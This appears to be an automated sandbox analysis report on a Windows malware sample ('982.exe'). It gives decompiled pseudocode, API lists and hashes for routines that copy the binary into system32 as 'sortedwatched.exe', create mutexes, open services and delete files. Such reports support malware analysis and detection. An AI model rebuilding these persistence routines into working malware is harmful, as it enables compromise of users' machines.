                  0x0040f4bd
                  0x0040f4bd
                  0x0040f4b7
                  0x0040f4af
                  0x0040f4c0
                  0x0040f4c1
                  0x00000000

                  APIs
                  • GetComputerNameW.KERNEL32(?,0040F111), ref: 0040F454
                  • WideCharToMultiByte.KERNEL32(00000000,00000400,?,000000FF,?,00000010,00000000,00000000,00000104,?,?,?,?,?,0040F956,00000102), ref: 0040F481
                  • _snprintf.NTDLL ref: 0040F4EF
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharComputerMultiNameWide_snprintf
                  • String ID: 813848_3C4E0000$X
                  • API String ID: 4080658169-2762417543
                  • Opcode ID: 2bc150695e65d2aa25e26b27c57a638bc2971cc0613965bb47d8cfdb1b1427d9
                  • Instruction ID: dbbf294783a5ce5e9b0548ade1bddf9532166b7a22268ff85b9ccd314504079c
                  • Opcode Fuzzy Hash: 2bc150695e65d2aa25e26b27c57a638bc2971cc0613965bb47d8cfdb1b1427d9
                  • Instruction Fuzzy Hash: D5115B719011086ADB30DA699D01BEB37AC9B11708F50113BEC45F12D1E77C8A0A83EE
                  Uniqueness

                  Uniqueness Score: 12.89%

                  Function 0040F63A, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 50UNIQUE
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0040F63A(void* __ecx, void* __edx, void* __edi, void* __eflags) {
				short _v524;
				void* _t7;
				WCHAR* _t34;

				_t34 = 0; // executed
				E00401000(); // executed
				_t7 = E0040108B(0x416c50, 0x416840); // executed
				if(_t7 == 0) {
					E00401503( &_v524, 0x104);
					GetTempPathW(0x104,  &_v524);
					GetTempFileNameW( &_v524, 0, 0,  &_v524);
					if(E0040108B(0x416840,  &_v524) != 0) {
						_t34 = E0040108B(0x416c50, 0x416840);
						_t38 = _t34;
						if(_t34 == 0) {
							E0040108B( &_v524, 0x416840); // executed
						}
					}
				}
				E004010DC(_t38); // executed
				return _t34;
			}






                  0x0040f645
                  0x0040f647
                  0x0040f658
                  0x0040f65f
                  0x0040f66f
                  0x0040f67c
                  0x0040f68c
                  0x0040f6a2
                  0x0040f6b0
                  0x0040f6b2
                  0x0040f6b4
                  0x0040f6be
                  0x0040f6be
                  0x0040f6b4
                  0x0040f6a2
                  0x0040f6c3
                  0x0040f6cf

                  APIs
                    • Part of subcall function 00401000: GetFileAttributesW.KERNELBASE(?,00000000,00000000), ref: 00401047
                    • Part of subcall function 00401000: CreateDirectoryW.KERNEL32(?,00000000), ref: 0040105A
                    • Part of subcall function 00401000: GetLastError.KERNEL32 ref: 00401064
                    • Part of subcall function 0040108B: memset.NTDLL ref: 004010A0
                    • Part of subcall function 0040108B: SHFileOperationW.SHELL32(?,?,?,?,?,?,?,?,?,0040F65D,00416840,00000104), ref: 004010C2
                  • GetTempPathW.KERNEL32(00000104,?), ref: 0040F67C
                  • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 0040F68C
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$Temp$AttributesCreateDirectoryErrorLastNameOperationPathmemset
                  • String ID: @hA$PlA$PlA
                  • API String ID: 130228747-2032501620
                  • Opcode ID: da8b0ef50ae2f127bfbd1831cbfe59f64a2b8a0fad9562421152777f72dc96db
                  • Instruction ID: 5d14a1be9669bfffb97e8a38806d051cd5262eb3adb47f349c5059f9eaae6cc3
                  • Opcode Fuzzy Hash: da8b0ef50ae2f127bfbd1831cbfe59f64a2b8a0fad9562421152777f72dc96db
                  • Instruction Fuzzy Hash: 7401AC31B0021417C72076658C459FB726D9F40355F00467BADC9E77B2EE39CD8687D8
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040C601, Relevance: 7.5, APIs: 5, Instructions: 40synchronizationCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0040C601(void* __eflags) {
				void* _t1;
				long _t3;
				void* _t4;
				long _t8;
				int _t13;

				_t13 = 0; // executed
				_t1 = E0040C4F5(__eflags); // executed
				if(_t1 == 0) {
					L10:
					return _t13;
				}
				_t3 = WaitForSingleObject( *0x41548c, 0);
				if(_t3 == 0) {
					L3:
					_t4 = E0040C54E(_t17); // executed
					_t18 = _t4;
					if(_t4 != 0 && E0040C5A7(_t18) != 0) {
						_t8 = SignalObjectAndWait( *0x414e6c,  *0x41365c, 0xffffffff, _t13);
						if(_t8 == 0 || _t8 == 0x80) {
							_t13 = ResetEvent( *0x414e6c);
						}
					}
					ReleaseMutex( *0x41548c);
					CloseHandle( *0x41548c); // executed
					L9:
					goto L10;
				}
				_t17 = _t3 - 0x80;
				if(_t3 != 0x80) {
					goto L9;
				}
				goto L3;
			}








                  0x0040c602
                  0x0040c604
                  0x0040c60b
                  0x0040c67e
                  0x0040c681
                  0x0040c681
                  0x0040c615
                  0x0040c622
                  0x0040c628
                  0x0040c628
                  0x0040c62d
                  0x0040c62f
                  0x0040c649
                  0x0040c651
                  0x0040c663
                  0x0040c663
                  0x0040c651
                  0x0040c66b
                  0x0040c677
                  0x0040c67d
                  0x00000000
                  0x0040c67d
                  0x0040c624
                  0x0040c626
                  0x00000000
                  0x00000000
                  0x00000000

                  APIs
                    • Part of subcall function 0040C4F5: _snwprintf.NTDLL ref: 0040C51D
                    • Part of subcall function 0040C4F5: CreateMutexW.KERNELBASE(00000000,00000000,?), ref: 0040C535
                  • WaitForSingleObject.KERNEL32(00000000,00000000), ref: 0040C615
                  • SignalObjectAndWait.KERNEL32(000000FF,00000000), ref: 0040C649
                  • ResetEvent.KERNEL32(?,?,0040F111), ref: 0040C65D
                  • ReleaseMutex.KERNEL32(?,?,0040F111), ref: 0040C66B
                  • CloseHandle.KERNELBASE ref: 0040C677
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: MutexObjectWait$CloseCreateEventHandleReleaseResetSignalSingle_snwprintf
                  • String ID:
                  • API String ID: 2255288334-0
                  • Opcode ID: 53fec47dd3a6376ce4d8dbe922b21d1394a5889b4255efbee4863a382fe81091
                  • Instruction ID: c0f7c5306684621e6a4500821fb11e6ef7d6b4f9c1040e922aa21da158988458
                  • Opcode Fuzzy Hash: 53fec47dd3a6376ce4d8dbe922b21d1394a5889b4255efbee4863a382fe81091
                  • Instruction Fuzzy Hash: 6AF03631544110DBDF312F76FC48A9A7A55AB45752714C736F801E12F0EA36C9109A5C
                  Uniqueness

                  Uniqueness Score: 0.01%

                  Function 0040F43E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74COMMON
                  Download Yara Rule
                  C-Code - Quality: 82%
                  			E0040F43E(void* __ebx) {
				long _v8;
				char _v24;
				short _v56;
				int _t14;
				void* _t15;
				int _t22;
				char _t24;
				char* _t33;

				_v8 = 0x10;
				_t14 = GetComputerNameW( &_v56,  &_v8); // executed
				if(_t14 == 0) {
					L12:
					_v24 = 0x58;
					L13:
					_t15 = E004019AB(0x412e30);
					 *0x414664(0x416738, 0x104, _t15,  &_v24,  *0x4164e0);
					return L00401B09(_t15);
				}
				_t22 = WideCharToMultiByte(0, 0x400,  &_v56, 0xffffffff,  &_v24, 0x10, E004019AB(0x412b90), 0);
				L00401B09(_t19);
				if((0 | _t22 > 0x00000000) == 0) {
					goto L12;
				}
				_t33 =  &_v24;
				if(_v24 == 0) {
					goto L13;
				} else {
					goto L3;
				}
				do {
					L3:
					_t24 =  *_t33;
					if(_t24 < 0x30 || _t24 > 0x39) {
						if(_t24 < 0x61 || _t24 > 0x7a) {
							if(_t24 < 0x41 || _t24 > 0x5a) {
								 *_t33 = 0x58;
							}
						}
					}
					_t33 = _t33 + 1;
				} while ( *_t33 != 0);
				goto L13;
			}











                  0x0040f448
                  0x0040f454
                  0x0040f45c
                  0x0040f4c8
                  0x0040f4c8
                  0x0040f4ce
                  0x0040f4d3
                  0x0040f4ef
                  0x0040f503
                  0x0040f503
                  0x0040f481
                  0x0040f490
                  0x0040f498
                  0x00000000
                  0x00000000
                  0x0040f49e
                  0x0040f4a1
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040f4a3
                  0x0040f4a3
                  0x0040f4a3
                  0x0040f4a7
                  0x0040f4af
                  0x0040f4b7
                  0x0040f4bd
                  0x0040f4bd
                  0x0040f4b7
                  0x0040f4af
                  0x0040f4c0
                  0x0040f4c1
                  0x00000000

                  APIs
                  • GetComputerNameW.KERNEL32(?,0040F111), ref: 0040F454
                  • WideCharToMultiByte.KERNEL32(00000000,00000400,?,000000FF,?,00000010,00000000,00000000,00000104,?,?,?,?,?,0040F956,00000102), ref: 0040F481
                  • _snprintf.NTDLL ref: 0040F4EF
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: ByteCharComputerMultiNameWide_snprintf
                  • String ID: X
                  • API String ID: 4080658169-3081909835
                  • Opcode ID: 2bc150695e65d2aa25e26b27c57a638bc2971cc0613965bb47d8cfdb1b1427d9
                  • Instruction ID: dbbf294783a5ce5e9b0548ade1bddf9532166b7a22268ff85b9ccd314504079c
                  • Opcode Fuzzy Hash: 2bc150695e65d2aa25e26b27c57a638bc2971cc0613965bb47d8cfdb1b1427d9
                  • Instruction Fuzzy Hash: D5115B719011086ADB30DA699D01BEB37AC9B11708F50113BEC45F12D1E77C8A0A83EE
                  Uniqueness

                  Uniqueness Score: 0.17%

                  Function 0040F2EE, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71fileUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 39%
                  			E0040F2EE(void* __eflags) {
				char _v524;
				char _v1044;
				short _v1564;
				char* _t17;
				int _t27;
				void* _t45;
				intOrPtr _t48;

				_t42 = E00401A52(0x412a00, 0x4bf67e71);
				E0040F190( &_v1044, _t9);
				L00401B09(_t42);
				_push( &_v524);
				_push(0);
				_push(0);
				_t48 =  *0x415f4c; // 0x0
				if(_t48 == 0) {
					 *0x414c14(0, 0x1c);
					_t43 = E00401A52(0x412df0, 0x4bf67e71);
					_t17 =  &_v524;
					 *0x4143a4(_t17, 0x104, _t15, _t17,  &_v1044);
					_t45 = _t45 + 0x14;
					L00401B09(_t43);
				} else {
					 *0x414c14(0, 0x29);
				}
				_t44 = E00401A52(0x412bb0, 0x4bf67e71);
				 *0x4143a4( &_v1564, 0x104, _t20,  &_v524,  &_v1044);
				L00401B09(_t44);
				_t27 = DeleteFileW( &_v1564); // executed
				return _t27;
			}










                  0x0040f30b
                  0x0040f315
                  0x0040f31c
                  0x0040f32c
                  0x0040f32f
                  0x0040f330
                  0x0040f331
                  0x0040f337
                  0x0040f347
                  0x0040f359
                  0x0040f362
                  0x0040f36c
                  0x0040f372
                  0x0040f377
                  0x0040f339
                  0x0040f33c
                  0x0040f33c
                  0x0040f388
                  0x0040f3a1
                  0x0040f3ac
                  0x0040f3b8
                  0x0040f3c4

                  APIs
                    • Part of subcall function 0040F190: lstrlenW.KERNEL32(00000000,00000000,00000000,00000104,?,?,0040F111), ref: 0040F1A1
                  • _snwprintf.NTDLL ref: 0040F36C
                  • _snwprintf.NTDLL ref: 0040F3A1
                  • DeleteFileW.KERNELBASE(?), ref: 0040F3B8
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: _snwprintf$DeleteFilelstrlen
                  • String ID: g8Cw
                  • API String ID: 3875729096-3103284439
                  • Opcode ID: e235a4feeaa79c33ada0ee46943aba6416484cecfd0d8ac7cae2eab99280496f
                  • Instruction ID: 657008bbddd63c106de985fdb09df341ec56487ec0cf543515cc0156050913b4
                  • Opcode Fuzzy Hash: e235a4feeaa79c33ada0ee46943aba6416484cecfd0d8ac7cae2eab99280496f
                  • Instruction Fuzzy Hash: 5C11B7B1A001189BC720E7619C449EB726DDB84355F0440BBF90AE3291EE385E858BED
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040F63A, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 50UNIQUE
                  Download Yara Rule

                  Control-flow Graph

                  C-Code - Quality: 100%
                  			E0040F63A(void* __ecx, void* __edx, void* __edi, void* __eflags) {
				short _v524;
				void* _t7;
				WCHAR* _t34;

				_t34 = 0; // executed
				E00401000(); // executed
				_t7 = E0040108B(0x416c50, 0x416840); // executed
				if(_t7 == 0) {
					E00401503( &_v524, 0x104);
					GetTempPathW(0x104,  &_v524);
					GetTempFileNameW( &_v524, 0, 0,  &_v524);
					if(E0040108B(0x416840,  &_v524) != 0) {
						_t34 = E0040108B(0x416c50, 0x416840);
						_t38 = _t34;
						if(_t34 == 0) {
							E0040108B( &_v524, 0x416840); // executed
						}
					}
				}
				E004010DC(_t38); // executed
				return _t34;
			}






                  0x0040f645
                  0x0040f647
                  0x0040f658
                  0x0040f65f
                  0x0040f66f
                  0x0040f67c
                  0x0040f68c
                  0x0040f6a2
                  0x0040f6b0
                  0x0040f6b2
                  0x0040f6b4
                  0x0040f6be
                  0x0040f6be
                  0x0040f6b4
                  0x0040f6a2
                  0x0040f6c3
                  0x0040f6cf

                  APIs
                    • Part of subcall function 00401000: GetFileAttributesW.KERNELBASE(?,00000000,00000000), ref: 00401047
                    • Part of subcall function 00401000: CreateDirectoryW.KERNEL32(?,00000000), ref: 0040105A
                    • Part of subcall function 00401000: GetLastError.KERNEL32 ref: 00401064
                    • Part of subcall function 0040108B: memset.NTDLL ref: 004010A0
                    • Part of subcall function 0040108B: SHFileOperationW.SHELL32(?), ref: 004010C2
                  • GetTempPathW.KERNEL32(00000104,?), ref: 0040F67C
                  • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 0040F68C
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$Temp$AttributesCreateDirectoryErrorLastNameOperationPathmemset
                  • String ID: C:\Users\user\982.exe$C:\Windows\system32\sortedwatched.exe
                  • API String ID: 130228747-3515039387
                  • Opcode ID: da8b0ef50ae2f127bfbd1831cbfe59f64a2b8a0fad9562421152777f72dc96db
                  • Instruction ID: 5d14a1be9669bfffb97e8a38806d051cd5262eb3adb47f349c5059f9eaae6cc3
                  • Opcode Fuzzy Hash: da8b0ef50ae2f127bfbd1831cbfe59f64a2b8a0fad9562421152777f72dc96db
                  • Instruction Fuzzy Hash: 7401AC31B0021417C72076658C459FB726D9F40355F00467BADC9E77B2EE39CD8687D8
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 00401000, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44UNIQUE
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 164 401000-401023 call 401503 167 401082-401084 164->167 168 401025-401027 164->168 170 401085-40108a 167->170 169 401029-40103e 168->169 171 401040-401050 GetFileAttributesW 169->171 172 401079-401080 169->172 173 401052-401062 CreateDirectoryW 171->173 174 401075-401077 171->174 172->167 172->169 173->172 175 401064-40106f GetLastError 173->175 174->172 176 401071-401073 174->176 175->172 175->176 176->170
                  C-Code - Quality: 100%
                  			E00401000() {
				short _v524;
				signed int _t14;
				signed char _t16;
				struct _SECURITY_ATTRIBUTES* _t24;
				void* _t25;

				E00401503( &_v524, 0x208);
				if( *0x416840 == 0) {
					L9:
					return 1;
				}
				_t24 = 0;
				do {
					_t14 =  *(_t24 + 0x416840) & 0x0000ffff;
					_t24 =  &(_t24->nLength);
					 *(_t25 + _t24 - 0x20a) = _t14;
					if(_t14 != 0x5c) {
						goto L8;
					}
					_t16 = GetFileAttributesW( &_v524); // executed
					if(_t16 != 0xffffffff) {
						if((_t16 & 0x00000010) == 0) {
							L6:
							return 0;
						}
						goto L8;
					}
					if(CreateDirectoryW( &_v524, 0) == 0 && GetLastError() != 0xb7) {
						goto L6;
					}
					L8:
				} while ( *(_t24 + 0x416840) != 0);
				goto L9;
			}








                  0x00401016
                  0x00401023
                  0x00401082
                  0x00000000
                  0x00401084
                  0x00401027
                  0x00401029
                  0x00401029
                  0x00401030
                  0x00401033
                  0x0040103e
                  0x00000000
                  0x00000000
                  0x00401047
                  0x00401050
                  0x00401077
                  0x00401071
                  0x00000000
                  0x00401071
                  0x00000000
                  0x00401077
                  0x00401062
                  0x00000000
                  0x00000000
                  0x00401079
                  0x00401079
                  0x00000000

                  APIs
                  • GetFileAttributesW.KERNELBASE(?,00000000,00000000), ref: 00401047
                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 0040105A
                  • GetLastError.KERNEL32 ref: 00401064
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: AttributesCreateDirectoryErrorFileLast
                  • String ID: C:\Windows\system32\sortedwatched.exe
                  • API String ID: 674977465-2966989349
                  • Opcode ID: dee8efce9c269e7c4a1d15193b6a7f5050b14d7034bc9b91ca44c9ed970938fa
                  • Instruction ID: 28d4eda84da1510f6b483daa07369c8cca4f66dd7d324f082ec51ad891a83a22
                  • Opcode Fuzzy Hash: dee8efce9c269e7c4a1d15193b6a7f5050b14d7034bc9b91ca44c9ed970938fa
                  • Instruction Fuzzy Hash: 9601A73580025456DB70AB64DC0CAE773ACEF40325F004A76D8E5E25F1EB7899C6C659
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 004010DC, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24fileUNIQUE
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 177 4010dc-40112a call 401a52 call 401b09 DeleteFileW
                  C-Code - Quality: 68%
                  			E004010DC(void* __eflags) {
				short _v524;
				int _t8;

				_t12 = E00401A52(0x412000, 0x7b38aa91);
				 *0x4143a4( &_v524, 0x104, _t3, "C:\Windows\system32\sortedwatched.exe");
				L00401B09(_t12);
				_t8 = DeleteFileW( &_v524); // executed
				return _t8;
			}





                  0x004010f5
                  0x00401109
                  0x00401114
                  0x00401120
                  0x0040112a

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: DeleteFile_snwprintf
                  • String ID: C:\Windows\system32\sortedwatched.exe$g8Cw
                  • API String ID: 366827715-662138423
                  • Opcode ID: dfb5d015bca185a9f7f25c1b73371922ca55bcfad04c171bb90386b752d709f9
                  • Instruction ID: 7ded67d4db3bd44581a8d62ce4f7b27048894e85998f6b6a93392d295cc14779
                  • Opcode Fuzzy Hash: dfb5d015bca185a9f7f25c1b73371922ca55bcfad04c171bb90386b752d709f9
                  • Instruction Fuzzy Hash: E5E0DF31A0031867C711B7649C0AADB3A2C8B00315F0002B6E969A7292EE789A9487DE
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040F504, Relevance: 6.1, APIs: 4, Instructions: 120serviceUNIQUE
                  Download Yara Rule
                  APIs
                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,0040F83E), ref: 0040F538
                    • Part of subcall function 004014F2: GetProcessHeap.KERNEL32(00000008,004129A0,00401A84,?,00000000,00000104,?,?,0040F0B9), ref: 004014F5
                    • Part of subcall function 004014F2: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 004014FC
                  • GetTickCount.KERNEL32(?,?,?,?,?,?,?,0040F83E), ref: 0040F583
                  • OpenServiceW.ADVAPI32(?,00000000,00000001,?,?,?,?,?,?,?,0040F83E), ref: 0040F5AD
                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,0040F83E), ref: 0040F5CF
                    • Part of subcall function 00401532: GetProcessHeap.KERNEL32(00000000,?,0040F628,?,?,?,?,?,?,?,0040F83E), ref: 00401535
                    • Part of subcall function 00401532: HeapFree.KERNEL32(00000000), ref: 0040153C
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$ErrorLastProcess$AllocateCountFreeOpenServiceTick
                  • String ID:
                  • API String ID: 23911195-0
                  • Opcode ID: fac3745332e7725cdee8b069e1895790159f467c09433e3b6f8da540b3a7d795
                  • Instruction ID: fb962817b9f77482ee3899ed83bed23c765ea0bda143a25e94a62ef856afa488
                  • Opcode Fuzzy Hash: fac3745332e7725cdee8b069e1895790159f467c09433e3b6f8da540b3a7d795
                  • Instruction Fuzzy Hash: 4E418071A00105BFDB259FA5DC86EEFBBB9EF44700F10013AF901F62A0DA759E068B58
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040108B, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36UNIQUE
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 183 40108b-4010ca memset SHFileOperationW 184 4010d1 183->184 185 4010cc-4010cf 183->185 186 4010d3-4010db 184->186 185->184 185->186
                  C-Code - Quality: 100%
                  			E0040108B(intOrPtr __ecx, intOrPtr __edx) {
				intOrPtr _v18;
				struct _SHFILEOPSTRUCTW _v36;
				int _t12;
				intOrPtr _t15;
				intOrPtr _t18;
				intOrPtr _t19;

				_t18 = __edx;
				_t19 = __ecx;
				memset( &_v36, 0, 0x1e);
				_v36.pFrom = _t19;
				_v36.pTo = _t18;
				_v36.fFlags = 0xe14;
				_t15 = 1;
				_v36.wFunc = 1;
				_t12 = SHFileOperationW( &_v36); // executed
				if(_t12 != 0 || _v18 != _t12) {
					_t15 = 0;
				}
				return _t15;
			}









                  0x00401099
                  0x0040109e
                  0x004010a0
                  0x004010a9
                  0x004010b1
                  0x004010b4
                  0x004010bd
                  0x004010bf
                  0x004010c2
                  0x004010ca
                  0x004010d1
                  0x004010d1
                  0x004010db

                  APIs
                  Strings
                  • C:\Windows\system32\sortedwatched.exe, xrefs: 00401091
                  Memory Dump Source
                  • Source File: 00000007.00000002.324668034.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: FileOperationmemset
                  • String ID: C:\Windows\system32\sortedwatched.exe
                  • API String ID: 1721435463-2966989349
                  • Opcode ID: 682f6c219f9bfd979f0dde3b6a2360b8c0ede6fa2ccc5cc8ec62cd2fdf7213a7
                  • Instruction ID: 61758c14e14ea73e7dd5b344baac78daadb18c4dc6455e4bc7b17e4a8dd0dbd3
                  • Opcode Fuzzy Hash: 682f6c219f9bfd979f0dde3b6a2360b8c0ede6fa2ccc5cc8ec62cd2fdf7213a7
                  • Instruction Fuzzy Hash: A7F05475E0025C5FDB109FA99C856EFB7BCFB84755F00013BE504F2240E6748A5487A5
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040C54E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31synchronizationUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 68%
                  			E0040C54E(void* __eflags) {
				short _v132;
				void* _t5;
				void* _t10;

				_t5 = E00401A52(0x412340, 0x72fc3a35);
				 *0x4143a4( &_v132, 0x40, _t5,  *0x415488);
				L00401B09(_t5);
				_t10 = CreateMutexW(0, 0,  &_v132); // executed
				 *0x41365c = _t10;
				return 0 | _t10 != 0x00000000;
			}






                  0x0040c562
                  0x0040c576
                  0x0040c581
                  0x0040c58e
                  0x0040c596
                  0x0040c5a6

                  APIs
                  • _snwprintf.NTDLL ref: 0040C576
                  • CreateMutexW.KERNELBASE(00000000,00000000,?), ref: 0040C58E
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateMutex_snwprintf
                  • String ID: g8Cw
                  • API String ID: 451050361-3103284439
                  • Opcode ID: e49b4b3da7b435a57b3e4e9c9e5cf4acdb66041148267d6b0e68d6df042f3639
                  • Instruction ID: 36c13beeff52031c9d9f833bd8c6959bb0ee47b01addbbb580c4d20d437467e3
                  • Opcode Fuzzy Hash: e49b4b3da7b435a57b3e4e9c9e5cf4acdb66041148267d6b0e68d6df042f3639
                  • Instruction Fuzzy Hash: F5F0EC717041145BD7146BA96C06BEA376CEB44305F00817EFA09E72D0EE34D91047DD
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040C4F5, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31synchronizationUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 68%
                  			E0040C4F5(void* __eflags) {
				short _v132;
				void* _t5;
				void* _t10;

				_t5 = E00401A52(0x4128e0, 0x72fc3a35);
				 *0x4143a4( &_v132, 0x40, _t5,  *0x415488);
				L00401B09(_t5);
				_t10 = CreateMutexW(0, 0,  &_v132); // executed
				 *0x41548c = _t10;
				return 0 | _t10 != 0x00000000;
			}






                  0x0040c509
                  0x0040c51d
                  0x0040c528
                  0x0040c535
                  0x0040c53d
                  0x0040c54d

                  APIs
                  • _snwprintf.NTDLL ref: 0040C51D
                  • CreateMutexW.KERNELBASE(00000000,00000000,?), ref: 0040C535
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateMutex_snwprintf
                  • String ID: g8Cw
                  • API String ID: 451050361-3103284439
                  • Opcode ID: 1cf742fb4f74ba7d072dd59c1caf93188d0326523d257606fcc74e63f0729243
                  • Instruction ID: 146b9e719d585fa1db09a36da7744ebe958f35a2f64565dee515f9001fd86055
                  • Opcode Fuzzy Hash: 1cf742fb4f74ba7d072dd59c1caf93188d0326523d257606fcc74e63f0729243
                  • Instruction Fuzzy Hash: 3FF0E5717442149BD700ABA9AC06BEE36ACEB44305F00803EFA09EB2D0EE3498148BDD
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 004010DC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24fileUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 68%
                  			E004010DC(void* __eflags) {
				short _v524;
				int _t8;

				_t12 = E00401A52(0x412000, 0x7b38aa91);
				 *0x4143a4( &_v524, 0x104, _t3, 0x416840);
				L00401B09(_t12);
				_t8 = DeleteFileW( &_v524); // executed
				return _t8;
			}





                  0x004010f5
                  0x00401109
                  0x00401114
                  0x00401120
                  0x0040112a

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000001.301581248.00400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000007.00000001.301644346.00417000.00000040.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_1_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: DeleteFile_snwprintf
                  • String ID: g8Cw
                  • API String ID: 366827715-3103284439
                  • Opcode ID: dfb5d015bca185a9f7f25c1b73371922ca55bcfad04c171bb90386b752d709f9
                  • Instruction ID: 7ded67d4db3bd44581a8d62ce4f7b27048894e85998f6b6a93392d295cc14779
                  • Opcode Fuzzy Hash: dfb5d015bca185a9f7f25c1b73371922ca55bcfad04c171bb90386b752d709f9
                  • Instruction Fuzzy Hash: E5E0DF31A0031867C711B7649C0AADB3A2C8B00315F0002B6E969A7292EE789A9487DE
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 00401000, Relevance: 4.5, APIs: 3, Instructions: 44COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00401000() {
				short _v524;
				signed int _t14;
				signed char _t16;
				struct _SECURITY_ATTRIBUTES* _t24;
				void* _t25;

				E00401503( &_v524, 0x208);
				if( *0x416840 == 0) {
					L9:
					return 1;
				}
